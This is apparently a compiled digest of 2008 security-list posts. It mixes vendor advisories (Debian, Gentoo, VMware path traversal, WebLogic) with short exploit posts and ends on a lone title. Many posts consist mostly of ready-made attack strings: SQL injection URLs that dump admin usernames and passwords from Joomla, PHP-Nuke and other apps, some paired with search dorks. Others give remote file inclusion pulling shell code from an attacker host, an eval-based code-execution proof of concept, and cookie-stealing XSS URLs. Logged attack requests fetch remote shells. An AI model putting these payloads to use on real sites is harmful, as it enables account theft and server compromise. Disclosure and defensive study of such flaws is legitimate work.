NULL pointer in SurgeFTP 2.3a2
### Luigi Auriemma Application: SurgeFTP http://www.netwinsite.com/surgeftp/ Versions: <= 2.3a2 Platforms:Windows, Linux and Solaris Bug: NULL pointer access Exploitation: remote Date: 25 Feb 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === SurgeFTP is a commercial FTP server which supports also SSL/TLS and has a web interface for remote administration. ### == 2) Bug == When a Content-Length parameter is received from the client, SurgeFTP tries to allocate the amount of memory (max 2147483647 bytes) specified in this field and then copies the data in the resulted new buffer. The problem is in the lack of checks on the result of the allocation which leads to the crash of the entire server during the copying of the data to a NULL pointer if that amount of memory cannot be allocated. ### === 3) The Code === http://aluigi.org/poc/surgeftpizza.txt nc SERVER 7021 -v -v < surgeftpizza.txt ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
Re: Powered by Pagetool Ver (1.04-05-06-07)
Discovered in June '07: http://packetstormsecurity.org/0706-exploits/pagetool-sql.txt On Sun, Feb 24, 2008 at 10:00:41AM -, [EMAIL PROTECTED] wrote: > Google arama : > www.1923turk.org > > Turkishwariorr > > Powered by Pagetool Ver 1.04 > Powered by Pagetool Ver 1.07 > Powered by Pagetool Ver 1.05 > Powered by Pagetool Ver 1.06 > > > > Site sonuna : > > index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
Format string and buffer-overflow in SurgeMail 38k4
###
Luigi Auriemma
Application: SurgeMail Mail Server
http://netwinsite.com/surgemail/
Netwin's WebMail
http://netwinsite.com/webmail/
Versions: SurgeMail <= 38k4 and beta 39a
Netwin's WebMail <= 3.1s (only bug A)
Platforms:Windows, Linux, FreeBSD, MacOSX and Solaris
Bugs: A] format string in webmail.exe's page command
B] buffer-overflow in the building of environment strings
Exploitation: remote
Date: 25 Feb 2008
Author: Luigi Auriemma
e-mail: [EMAIL PROTECTED]
web:aluigi.org
###
1) Introduction
2) Bugs
3) The Code
4) Fix
###
===
1) Introduction
===
SurgeMail is a well known commercial multiplatform mail server which
supports many protocols.
###
===
2) Bugs
===
--
A] format string in webmail.exe's page command
--
The CGI used for the handling of the webmail interface (webmail.exe) is
affected by a format string vulnerability in the function which builds
the error message when a wrong page is requested and passes it directly
to lvprintf without the needed format argument:
"TPL: Failed to Locate Template
{c:\surgemail\webmail\panel\%s%s%s%s%s%s.tpl}{2=No such file or directory}"
Sample URL for exploiting the vulnerability:
http://SERVER/scripts/webmail.exe?page=%n%n%n%s%s%s%s
-
B] buffer-overflow in the building of environment strings
-
A buffer overflow vulnerability is located in the function which
handles the real CGI executables (which must be not confused with the
.cgi virtual files like user.cgi, admin.cgi and so on).
When the server receives a HTTP request for a real CGI (like for
example webmail.exe) it uses a buffer of about 2 bytes for storing
all the environment strings which will be passed to the called program.
The HTTP fields passed by the client in his request are truncated at
200 bytes for the parameter and 800 for its value and are added as
environment variables (HTTP_parameter=value).
The lack of checks on the size of this environment buffer leads to a
buffer-overflow, anyway although is possible to control some registers
code execution is not certain.
Naturally both the surgemail and the swatch (port 7027) processes are
affected by this vulnerability.
###
===
3) The Code
===
http://aluigi.org/poc/surgemailz.zip
###
==
4) Fix
==
No fix
###
---
Luigi Auriemma
http://aluigi.org
[SECURITY] [DSA 1508-1] New diatheke packages fix arbirary shell command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1508-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst February 25, 2008 http://www.debian.org/security/faq - Package: diatheke Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE Id : CVE-2008-0932 Debian Bug : 466449 Dan Dennison discovered that Diatheke, a CGI program to make a bible website, performs insufficient sanitising of a parameter, allowing a remote attacker to execute arbitrary shell commands as the web server user. For the stable distribution (etch), this problem has been fixed in version 1.5.9-2etch1. For the old stable distribution (sarge), this problem has been fixed in version 1.5.7-7sarge1. For the unstable distribution (sid), this problem has been fixed in version 1.5.9-8. We recommend that you upgrade your diatheke package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/s/sword/sword_1.5.7-7sarge1.dsc Size/MD5 checksum: 938 4f7872250c457ac36f0b20b4be235647 http://security.debian.org/pool/updates/main/s/sword/sword_1.5.7-7sarge1.diff.gz Size/MD5 checksum: 277640 f8993cddacdac25ca55b7e99ced8ff49 http://security.debian.org/pool/updates/main/s/sword/sword_1.5.7.orig.tar.gz Size/MD5 checksum: 1482711 369f09068839c646aeab691c63a40d67 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_alpha.deb Size/MD5 checksum: 861694 ca88e3e550ae01cd8e3ad1a6d6471814 http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_alpha.deb Size/MD5 checksum: 419320 35838e66e76e99777524aa81741025c8 http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_alpha.deb Size/MD5 checksum:61684 b97611c37f53b39941573e6c76609c40 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_amd64.deb Size/MD5 checksum: 602656 c4b37895a49dce481ea3c6a8817123c2 http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_amd64.deb Size/MD5 checksum:56944 ad12da845e900e3a28c70b9b2baa6d70 http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_amd64.deb Size/MD5 checksum: 383486 614d4988fd26ccc58dbe1029aacb7930 arm architecture (ARM) http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_arm.deb Size/MD5 checksum:60386 3400611bc0cba8ea77e4bfbeaa659ac6 http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_arm.deb Size/MD5 checksum: 664170 d0d17f06931f3e6076aed502e8128d5c http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_arm.deb Size/MD5 checksum: 423264 9951b8913a4c6b18b357aead48e53f6c hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_hppa.deb Size/MD5 checksum:62772 676ff7f61ab0ee7629e7fcb59d67cfd5 http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_hppa.deb Size/MD5 checksum: 494764 15e5da49e21a167088aacebf94a12367 http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_hppa.deb Size/MD5 checksum: 750722 44a066596efa0bb63b184635d3d9c985 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_i386.deb Size/MD5 checksum: 556994 f04d2f9bc41e5703967630adf4e12754 http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_i386.deb Size/MD5 checksum: 388072 4dabb05ea1d6b72ba61e8877cbad1544 http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_i386.deb Size/MD5 checksum:58108 665ce388ee9a74a0d850007beae3051a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_ia64.deb Size/MD5 checksum: 466340 0a9f1874a5ee1d6617da38d4f7417802 http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_ia64.deb Size/MD5 checksum:64644 e50afdc379e2ee1cfc63362ca56b6a43 http://security.debian.org/pool/updates/main/s/sword/
Powered by Pagetool Ver (1.04-05-06-07)
Google arama : www.1923turk.org Turkishwariorr Powered by Pagetool Ver 1.04 Powered by Pagetool Ver 1.07 Powered by Pagetool Ver 1.05 Powered by Pagetool Ver 1.06 Site sonuna : index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN
1) Remote File Inclusion
File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?
2) Cross-Site Scripting
Register Globals: ON
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E
Register Globals: Off
Vuln Line:(3)
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
3) Remote Code Execution
Register Globals: ON
Code:
'.$text;
eval ('?>'.$text);
?>
Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection
Aria-Security Team (Persian Security Network) http://Aria-Security.Net --- Shoutz: Aura, imm02tal, Kinglet, iM4n Joomla Com_publication "pid" Remote SQL Injection index.php?option=com_publication&task=view&pid=-999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/* note: the prefix (jos_) maybe different for each website... Regards, The-0utl4w Credits Goes to Aria-Security Team
CORE-2007-0930 Path Traversal vulnerability in VMware's shared folders implementation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ~ Core Security Technologies - CoreLabs Advisory ~ http://www.coresecurity.com/corelabs Path Traversal vulnerability in VMware's shared folders implementation *Advisory Information* Title: Path Traversal vulnerability in VMware's shared folders implementation Advisory ID: CORE-2007-0930 Advisory URL: http://www.coresecurity.com/?action=item&id=2129 Date published: 2008-02-25 Date of last update: 2008-02-25 Vendors contacted: VMware Inc. Release mode: User release *Vulnerability Information* Class: Input Validation Error Remotely Exploitable: Yes Locally Exploitable: Yes Client-side Exploitable: No Bugtraq ID: 27944 CVE Name: CVE-2008-0923 *Vulnerability Description* Software from VMWare Inc. allows users to run an entire computer system composed of hardware, OS and applications within a virtualized environment isolated from the real hardware resources and the computer system that controls them. Virtualization technologies such as VMware's increase efficiency in the use of hardware and help to reduce operational costs through consolidation of servers and desktop system running on fewer and more maintainable hardware systems. Among the many reasons that promote the adoption virtualization technologies, one of the most commons today is the promise of an improved information security posture due to the implied isolation between multiple virtualized systems (referred as Guest systems) and the non-virtualized systems controlling the virtualization hardware and software (the Host system) [1]. Consequently, software bugs that could allow potential attackers to invalidate the premise of effective isolation between Host and Guest systems are considered security vulnerabilities with a potentially high impact. Attacks to exploit these type of vulnerabilities has been discussed on several public forums [2][3]. To maintain and improve user inter-operation with virtualized and non-virtualized systems VMware's software implements a number of inter-system communication features. The Shared Folder mechanism is one of such features and is enabled by default in all VMware's products that provide it. VMware's shared folders allow users to transfer data between a virtualized system (Guest) and the non-virtualized Host system that contains it. This form of data transfer is available to users of the Guest system through read and write access to file system folders shared by both Guest and Host system. To maintain effective isolation between Guest and Host systems, these mechanisms should limit access from the Guest only to the Host system's folders that are selected for sharing with the virtualized guests. A vulnerability was found in VMware's shared folders mechanism that grants users of a Guest system read and write access to any portion of the Host's file system including the system folder and other security-sensitive files. Exploitation of these vulnerability allows attackers to break out of an isolated Guest system to compromise the underlying Host system that controls it. Successful exploitation requires that the Shared Folder's feature to be enabled which is the default on VMware products that have the feature AND at least one folder of the Host system is configured for sharing. *Vulnerable Packages* . VMWare Workstation 6.0.2 . VMWare Workstation 5.5.4 . VMWare Player 2.0.2 . VMWare Player 1.0.4 . VMWare ACE 2.0.2 . VMWare ACE 1.0.2 *Non-vulnerable Packages* . VMWare ESX . VMWare Server *Vendor Information, Solutions and Workarounds* Disable the Shared Folders feature for all virtual machines. On VMWare Workstation this can be done by clicking on "Edit virtual machine settings" and disabling shared folders in the Options tab. The vendor has published a security alert with a setp-by-step description of how to disable Shared Folders on affected products. *Critical VMware Security Alert for Windows-Hosted VMware Workstation, VMware Player, and VMware ACE* http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1004034 *Credits* This vulnerability was discovered by Gerardo Richarte while developing an exploit for vulnerability CVE-2007-1744. The final exploit for both vulnerabilities was developed by Nicolas Economou, both of them from CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies. *Technical Description / Proof of Concept Code* While developing an exploit for the CVE-2007-1744 vulnerability [4] the root cause of the original bug was identified in the way that the 'PathName' parameter is processed by the VMware API that provides the Shared Folders functionality in the Guest operating system. The 'PathName' parameter is converted from a multi byte string to a wide character string after verifying that it doesn't contain the dot-dot substring (the two-byte sequence '0x2e0x2e' that translates to the ASCII substring '".."') that may allow a malicious user to break out of the shared
[ GLSA 200802-10 ] Python: PCRE Integer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200802-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: PCRE Integer overflow Date: February 23, 2008 Bugs: #198373 ID: 200802-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability within Python's copy of PCRE might lead to the execution of arbitrary code. Background == Python is an interpreted, interactive, object-oriented programming language. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-lang/python < 2.3.6-r4>= 2.3.6-r4 Description === Python 2.3 includes a copy of PCRE which is vulnerable to an integer overflow vulnerability, leading to a buffer overflow. Impact == An attacker could exploit the vulnerability by tricking a vulnerable Python application to compile a regular expressions, which could possibly lead to the execution of arbitrary code, a Denial of Service or the disclosure of sensitive information. Workaround == There is no known workaround at this time. Resolution == All Python 2.3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r4" References == [ 1 ] CVE-2006-7228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7228 [ 2 ] GLSA 200711-30 http://www.gentoo.org/security/en/glsa/glsa-200711-30.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200802-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
Packeteer Products File Listing XSS
Packeteer Products File Listing XSS Product: Packeteer PacketShaper http://www.packeteer.com/products/packetshaper/ Packeteer PolicyCenter http://www.packeteer.com/products/packetshaper/policycenter.cfm The web management interface of several Packeteer products contains a cross-site scripting vulnerability in the file listing function. Parameter FILELIST, specified in an arbitrary page request, is not sufficiently sanitized before it gets embedded in the HTML output of the Error Report page. (The parameter value is limited to 64 characters.) Example: https://(target)/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E The vulnerability has been identified in version 8.2.2. However, other versions may be also affected. Solution: Do not stay logged into the Packeteer web management interface while browsing other web sites. Found by: nnposter
Php Nuke "Sell" module SQL Injection ("cid")
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
Shoutz: Aura, imm02tal, Kinglet, iM4n
Php Nuke "Sell" module SQL Injection ("cid")
modules.php?name=Sell&d_op=viewsell&cid=-999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Original Adivosry:
http://forum.aria-security.net/showthread.php?p=1475
Regards,
The-0utl4w
Credits Goes to Aria-Security Team
[SECURITY] [DSA 1506-1] New iceape packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1506-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff February 24, 2008 http://www.debian.org/security/faq - Package: iceape Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594 Several remote vulnerabilities have been discovered in the Iceape internet suite, an unbranded version of the Seamonkey Internet Suite. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-0412 Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul Nickerson discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2008-0413 Carsten Book, Wesley Garland, Igor Bukanov, "moz_bug_r_a4", "shutdown", Philip Taylor and "tgirmann" discovered crashes in the Javascript engine, which might allow the execution of arbitrary code. CVE-2008-0414 "hong" and Gregory Fleisher discovered that file input focus vulnerabilities in the file upload control could allow information disclosure of local files. CVE-2008-0415 "moz_bug_r_a4" and Boris Zbarsky discovered discovered several vulnerabilities in Javascript handling, which could allow privilege escalation. CVE-2008-0417 Justin Dolske discovered that the password storage machanism could be abused by malicious web sites to corrupt existing saved passwords. CVE-2008-0418 Gerry Eisenhaur and "moz_bug_r_a4" discovered that a directory traversal vulnerability in chrome: URI handling could lead to information disclosure. CVE-2008-0419 David Bloom discovered a race condition in the image handling of designMode elements, which can lead to information disclosure or potentially the execution of arbitrary code. CVE-2008-0591 Michal Zalewski discovered that timers protecting security-sensitive dialogs (which disable dialog elements until a timeout is reached) could be bypassed by window focus changes through Javascript. CVE-2008-0592 It was discovered that malformed content declarations of saved attachments could prevent a user in the opening local files with a ".txt" file name, resulting in minor denial of service. CVE-2008-0593 Martin Straka discovered that insecure stylesheet handling during redirects could lead to information disclosure. CVE-2008-0594 Emil Ljungdahl and Lars-Olof Moilanen discovered that phishing protections could be bypassed with elements. For the stable distribution (etch), these problems have been fixed in version 1.0.12~pre080131b-0etch1. The Mozilla releases from the old stable distribution (sarge) are no longer supported with security updates. We recommend that you upgrade your iceape packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b.orig.tar.gz Size/MD5 checksum: 43535826 39071cd311888d73254336b782109776 http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch1.dsc Size/MD5 checksum: 1439 eaee68845cb7d4660609f6c47ac01666 http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch1.diff.gz Size/MD5 checksum: 269895 fb6e3c3d3bc4a94773c1b4921fdb42d6 Architecture independent packages: http://security.debian.org/pool/updates/main/i/iceape/mozilla_1.8+1.0.12~pre080131b-0etch1_all.deb Size/MD5 checksum:27208 91bbb99fad75c41e2df1170749014288 http://security.debian.org/pool/updates/main/i/iceape/mozilla-calendar_1.8+1.0.12~pre080131b-0etch1_all.deb Size/MD5 checksum:27210 0233d457074aa58542b8662c2a54c48a http://security.debian.org/pool/updates/main/i/iceape/mozilla-js-debugger_1.8+1.0.12~pre080131b-0etch1_all.deb Size/MD5 checksum:27244 51f7e38462c1f39e0c662e4b58eca43a http://security.debian.org/pool/updates/main/i/iceape/iceape-chatzilla_1.0.12~pre080131b-0etch
S21SEC-040-en: Infinite invalid authentication attempts possible in BEA WebLogic Server
## - S21Sec Advisory - ## Title: Infinite invalid authentication attempts possible in BEA WebLogic Server ID: S21SEC-040-en Severity: Medium Scope: BEA Weblogic Platforms: All Author: [EMAIL PROTECTED] URL: http://www.s21sec.com/avisos/s21sec-040-en.txt Release: Public [ SUMMARY ] It's possible to launch a credentials brute force attack against known users through an internal servlet that permits the bypass of the user locking mechanism. [ AFFECTED VERSIONS ] The vulnerability was confirmed on: 7.0sp6 8.1sp4 9.0sp2 Versions 6 and previous are not vulnerable. [ DESCRIPTION ] BEA WebLogic Server is the world leading application server software. To avoid credential brute force attacks, Weblogic server have a locking mechanism that lock the corresponding account after some invalid login attempts. The default lock shots if 5 invalid login attempts were made. The lock remains 30 minutes. S21SEC has found that exists an internal servlet that allow the guess of valid credentials even if the attacked account is locked. This allows infinite invalid authentication attempts against an account. When the correct credentials are guessed, it's only needed to wait for the account to unlock and then logon into the server. The affected servlet is: /wl_management_internal1/LogfileSearch (Version 7 & 8) /bea_wls_diagnostics/accessor (Version 9) [ WORKAROUND ] BEA has released an advisory about this vulnerability. Updates and more information are available at Bea website: http://dev2dev.bea.com/pub/advisory/271 [ ACKNOWLEDGMENTS ] This vulnerability has been found and researched by: Ramon Pinuaga Cascales [ REFERENCES ] http://dev2dev.bea.com/pub/advisory/271
Alkacon OpenCms tree_files.jsp resource XSS
Alkacon OpenCms tree_files.jsp resource XSS Product: Alkacon OpenCms http://www.opencms.org/ OpenCms contains a cross-site scripting vulnerability in the file tree navigation function. An invalid value supplied to parameter resource in page opencms/system/workplace/views/explorer/tree_files.jsp is not sanitized before it gets embedded in the HTML output as part of a JavaScript comment. Example: http://(target)/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ The vulnerability has been identified in version 7.0.3. However, other versions may be also affected. Solution: Users should not browse untrusted sites while logged into OpenCms. Found by: nnposter
[SECURITY] [DSA 1507-1] New turba2 packages fix permission testing
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1507-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp February 24, 2008 http://www.debian.org/security/faq - Package: turba2 Vulnerability : programming error Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0807 Debian Bug : 464058 Peter Paul Elfferich discovered that turba2, a contact management component for horde framework did not correctly check access rights before allowing users to edit addresses. This could result in valid users being able to alter private address records. For the stable distribution (etch), this problem has been fixed in version 2.1.3-1etch1. For the old stable distribution (sarge), this problem has been fixed in version 2.0.2-1sarge1. For the unstable distribution (sid), this problem has been fixed in version 2.1.7-1. We recommend that you upgrade your turba2 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2-1sarge1.dsc Size/MD5 checksum: 626 78ef803c5a5c3c0564ddd8b23a96da4d http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2-1sarge1.diff.gz Size/MD5 checksum: 8049 8ccfd8d4f1886141a916d706217d8a73 http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2.orig.tar.gz Size/MD5 checksum: 1221378 43381a9620d08ad17758fc533e865db3 Architecture independent packages: http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2-1sarge1_all.deb Size/MD5 checksum: 1282950 ee4a5791cb7b942305f9095b9b3ae697 Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3-1etch1.diff.gz Size/MD5 checksum: 7434 fcef7709711274ebf26b99e3032f4e7e http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3.orig.tar.gz Size/MD5 checksum: 1790717 a0407717f3f64fb33f6a57e2244a12b4 http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3-1etch1.dsc Size/MD5 checksum: 722 0aa309ef908c6ab95b62fa6fbb97d7c5 Architecture independent packages: http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3-1etch1_all.deb Size/MD5 checksum: 1860044 0fb704f257a5d583196e10de104289f0 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHwWuDwM/Gs81MDZ0RAinaAJ9711WgcsQv3xAQ8dOautoN5BKMzgCfV4Ck Azcmd1e9g/lOp0fVreD+G+Y= =CWD7 -END PGP SIGNATURE-
Pigyard Art Gallery Multiple SQL Injection
Aria-Security Team, http://Aria-Security.net --- Shout Outs: AurA, imm02tal, iM4N, Kinglet, Vendor: Pigyard Art Gallery Multiple SQL Injection This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181) Original Link: http://forum.aria-security.net/showthread.php?p=1474 module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-99/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-99/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* Regards, The-0utl4w Credits Goes To Aria-Security.Net
Softbiz jokes and funny pictures (index.php) sql injection
Script:Softbiz jokes & funny pictures Author:-=Mizo=- Dork:inurl:/index.php?sbcat_id= Exploit:/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/* Admin cpanel:/path/admin Greetz: L!0n - Red_casper - SoSo H H - DC - Iraqi_strike - Crack_man - B0rizQ - Mahmood_ali - Net^Virus - iraqi_strike and all my friends!!
Joomla com_inter "id" Remote SQL Injection
Aria-Security Team (Persian Security Network) http://Aria-Security.Net --- Shoutz : AurA, Sc0rp!on, mormoroth, Kinglet, iM4N, Joomla com_inter "id" Remote SQL Injection index.php?option=com_inter&op=The-0utl4wz&id=-11/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user (Original Advisory@ http://forum.aria-security.net/showthread.php?p=1464) The-0utl4w Aria-Security Team (Credits to Aria-Security Team)
Joomla Com_blog "pid" Remote SQL Injection
Aria-Security Team (Persian Security Network) http://Aria-Security.Net --- Shoutz : The-0utl4w, Sc0rp!on, T3rr0r1st, mormoroth, Kinglet Joomla Com_blog "pid" Remote SQL Injection index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL INJECTION (More info and guide on how to use this bug @ http://forum.aria-security.net/showthread.php?p=1461) AurA, Aria-Security Team (Credits to Aria-Security Team)
joomla com_simpleshop SQL Injection(section) #
### # # joomla com_simpleshop SQL Injection(section) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl:"com_simpleshop" # # DORK 2 : allinurl: "com_simpleshop"section # EXPLOIT : index.php?option=com_simpleshop&[EMAIL PROTECTED]&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
Re: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)
Hi list, I am seeing scans for this in the "wild" now... As Dominique said, I don't know who would open up their SIM to the world, but better apply the patch soon. 222.239.78.91 - - [22/Feb/2008:17:24:48 -0300] "GET /wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6792 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" 195.189.85.162 - - [23/Feb/2008:12:04:55 -0300] "GET /wiki/index.php//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6605 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" 61.19.38.155 - - [23/Feb/2008:14:07:28 -0300] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://h1.ripway.com/durhaka/cmdasca.txt? HTTP/1.1" 200 6891 "-" "libwww-perl/5.803" Thanks, -- Daniel B. Cid dcid ( at ) ossec.net
joomla com_wines SQL Injection(id)
